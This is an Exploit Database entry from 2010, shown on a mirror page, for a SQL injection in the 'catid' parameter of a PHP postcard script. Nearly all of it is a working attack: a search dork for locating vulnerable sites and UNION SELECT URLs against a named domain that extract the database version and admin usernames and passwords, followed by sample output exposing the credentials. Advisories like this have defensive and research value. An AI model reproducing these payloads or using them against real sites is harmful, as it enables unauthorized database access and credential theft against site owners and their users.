post Card – ‘catid’ SQL Injection

• Exploit Database
• 14 阅读

• 作者： Hussin X
  日期： 2010-03-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11892/

• post Card ( catid ) Remote SQL Injection Vulnerability
  ___________________________________
  
  Author: Hussin X
  
  Home : www.iqs3cur1ty.com<http://www.iqs3cur1ty.com> & www.iq-ty.com<http://www.iq-ty.com>
  
  MaiL : darkangeL_G85@Yahoo.CoM
  ___________________________________
  
  script : http://webbdomain.com/php/postcarden/index2.php
  script : http://webbdomain.com/php/postcardir/index2.php
  version : all
  DorK : inurl:choosecard.php?catid=
  _____
  
  ExploiT & Demo
  _______
  
  
  version :
  
  http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+version%28%29,555555555555,6666666666666666666+from+admin--
  
  user & pass :
  
  http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+concat%28username,0x3a,password%29,555555555555,6666666666666666666+from+admin--
  
  
  
  Note : Exploit in Source page
  
  Example :
  
  <td><a style="text-decoration:none" href='https://www.exploit-db.com/exploits/11892/chosencard.php?id=5.0.89-community // << version :D
  
  <td><a style="text-decoration:none" href='https://www.exploit-db.com/exploits/11892/chosencard.php?id=admin:admin' // << here user and pass